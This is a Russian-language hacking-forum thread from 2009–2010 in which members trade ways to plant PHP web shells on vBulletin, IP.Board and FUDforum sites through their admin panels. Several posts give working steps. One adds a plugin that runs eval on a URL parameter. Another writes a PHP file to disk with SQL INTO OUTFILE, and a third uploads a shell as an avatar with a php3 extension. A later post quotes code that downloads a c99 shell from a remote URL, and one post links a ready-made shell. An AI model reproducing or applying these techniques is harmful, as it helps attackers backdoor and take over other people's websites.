HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 26.08.2009, 11:24
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию

Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.
 
Ответить с цитированием

  #42  
Старый 26.08.2009, 15:13
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);
потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete
 
Ответить с цитированием

  #43  
Старый 15.09.2009, 07:59
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами: 8845773

Репутация: -11
По умолчанию

в булке 3.5.1 у меня нет прав на модули и редактирование прав. ПОдскажите можно ли канибудь через стили залить или другое.
 
Ответить с цитированием

  #44  
Старый 18.09.2009, 13:40
-=void=-
Новичок
Регистрация: 24.02.2007
Сообщений: 11
С нами: 10111263

Репутация: 4
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);
потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete
А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((
 
Ответить с цитированием

  #45  
Старый 19.12.2009, 01:26
NeKit
Новичок
Регистрация: 29.12.2008
Сообщений: 4
С нами: 9139533

Репутация: 0
По умолчанию

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.
 
Ответить с цитированием

  #46  
Старый 19.12.2009, 02:09
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от -=void=-  
А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((
мб винда? а ты пишешь комманды никса... попробуй весь код шелла вписать вместо eval`a , но без <? ?> потом уже загрузить шелл в какуе-то папку (которая доступна для записи)

Последний раз редактировалось .:[melkiy]:.; 19.12.2009 в 02:15..
 
Ответить с цитированием

  #47  
Старый 19.12.2009, 03:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от NeKit  
Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.
можно так попробовать:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

Тестилось на IBP 3.0.1 nulled

шелл: http://site.ru/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

http://site.ru/index.php?app=core&module=usercp&tab=members&area= avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

http://site.ru/uploads/av-1.php3

Последний раз редактировалось Pashkela; 19.12.2009 в 04:05..
 
Ответить с цитированием

  #48  
Старый 22.12.2009, 20:22
MaKaKaZ
Новичок
Регистрация: 30.10.2009
Сообщений: 2
С нами: 8700726

Репутация: 0
По умолчанию

Просто возьми готовый шел: http://autospanner.ru/menu/groovie.rar
 
Ответить с цитированием

  #49  
Старый 24.12.2009, 18:49
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Подскажите как залить шелл через админку FUDforum 2.7.6

Здесь не густо

Последний раз редактировалось .:[melkiy]:.; 24.12.2009 в 19:01..
 
Ответить с цитированием

  #50  
Старый 05.02.2010, 01:38
Lexeon
Участник форума
Регистрация: 16.11.2006
Сообщений: 100
С нами: 10254106

Репутация: 3
По умолчанию

Есть IP.Board 2.3.6 , через шаблоны шелл залить не получается так как закрыты все папки для записи. Есть также все админы в том числе и самый первый. раньше с помощью него в настройках исполнял команду
$data=implode('',file('http://ssilka/do/shella/c99.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);

Нормально было шел заливался. Но сейчас так не делается и шела нету. В чем может быть проблема, как её обойти, и какие ещё могут быть способы?
Заранее спс
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Заливка шелла в Cms|Blogs ] ZAMUT Веб-уязвимости 13 18.03.2019 04:46
Проблема с заливкой шелла в Invision Power Board v2.1.7 DeadMeat Уязвимости CMS / форумов 9 24.02.2010 11:48
Способы заливки шелла в Ipb 1.3 - не стандартнные. zl0ba Уязвимости CMS / форумов 1 13.11.2006 12:36
Помогите использовать багу сайта в качестве заливки шелла на сайт... PhoenixLion PHP 0 23.05.2006 12:45
UBB Threads 6.5.1 (Инструкция по заливке шелла) pch Уязвимости CMS / форумов 0 30.04.2006 20:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.